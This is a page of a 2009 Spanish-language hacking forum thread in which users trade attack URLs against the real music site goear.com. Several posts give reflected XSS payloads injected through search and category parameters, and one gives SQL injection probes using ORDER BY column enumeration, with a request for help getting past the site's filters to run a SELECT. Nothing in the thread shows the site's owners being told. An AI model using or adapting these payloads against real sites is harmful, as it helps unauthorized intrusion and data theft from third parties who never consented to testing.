elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  xss en goear.com		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: xss en goear.com  (Leído 22,786 veces)
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #20 en: 10 Noviembre 2009, 04:16 am »
agrego un xss, más.lo obutbe a partir del titulo  :xD:

http://www.goear.com/searchbycat.php?c=%3C/title%3E%3Cscript%3Ealert%28%22Otro%20xss%20mas%22%29%3C/script%3E

esta minado de xss!


saludos!
« Última modificación: 10 Noviembre 2009, 04:21 am por fede_cp » En línea
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #21 en: 10 Noviembre 2009, 04:25 am »
Cita de: fede_cp en 10 Noviembre 2009, 04:16 am
agrego un xss, más.lo obutbe a partir del titulo  :xD:

http://www.goear.com/searchbycat.php?c=%3C/title%3E%3Cscript%3Ealert%28%22Otro%20xss%20mas%22%29%3C/script%3E

esta minado de xss!


saludos!

No te metas al login  :silbar: ajajajajajaja

Saludos ;)
En línea
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #22 en: 10 Noviembre 2009, 04:34 am »
Cita de: janito24 en 10 Noviembre 2009, 04:25 am
Cita de: fede_cp en 10 Noviembre 2009, 04:16 am
agrego un xss, más.lo obutbe a partir del titulo  :xD:

http://www.goear.com/searchbycat.php?c=%3C/title%3E%3Cscript%3Ealert%28%22Otro%20xss%20mas%22%29%3C/script%3E

esta minado de xss!


saludos!

No te metas al login  :silbar: ajajajajajaja

Saludos ;)
no entendi jajaj
saludos
En línea
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
YST


Desconectado Desconectado

Mensajes: 965


I'm you


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #23 en: 10 Noviembre 2009, 04:38 am »
Pero lo de descargar el .mp3 no es un bug :xD
En línea


Yo le enseñe a Kayser a usar objetos en ASM
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #24 en: 10 Noviembre 2009, 04:39 am »
ESTA bbien!!. me equiboque! jajaj


saludos
En línea
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
YST


Desconectado Desconectado

Mensajes: 965


I'm you


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #25 en: 10 Noviembre 2009, 15:59 pm »
Cita de: fede_cp en 10 Noviembre 2009, 04:39 am
ESTA bbien!!. me equiboque! jajaj


saludos
Pero no me grites :¬¬
En línea


Yo le enseñe a Kayser a usar objetos en ASM
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #26 en: 10 Noviembre 2009, 16:03 pm »
jajaja

si quieren un bug:

http://www.goear.com/listenwin.php?v=78707c5%27-1+Order/**/+By+33--++

http://www.goear.com/listenwin.php?v=78707c5%27-1+Order/**/+By+34--++

ahi si hay una sqlI

lo que no pude hacer fue hacer el SELECT, tiene buenos filtros, no lo pude sacar ni poniendo maysuculas ni /**/, asique si alguien me ayuda

mandenme el mail por mp asi lo hablamos


saludos!
En línea
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: xss en goear.com
« Respuesta #27 en: 10 Noviembre 2009, 22:08 pm »
otro mas: http://www.goear.com/search.php?q=leonchalon&p=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28%22Holamundo%22%29%3C/script%3E
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: xss en goear.com
« Respuesta #28 en: 10 Noviembre 2009, 22:10 pm »
pobre goear ya le dieron vuelta la web completa.. falta un lfi y estamos jajaja..
En línea
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: xss en goear.com
« Respuesta #29 en: 10 Noviembre 2009, 22:36 pm »
Tiene todos los bugs conocidos xD me arrepiento de haber posteado esa web xD por lo menos ningún lammer le ha hecho un pwned xD
En línea
Páginas: 1 2 [3] 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines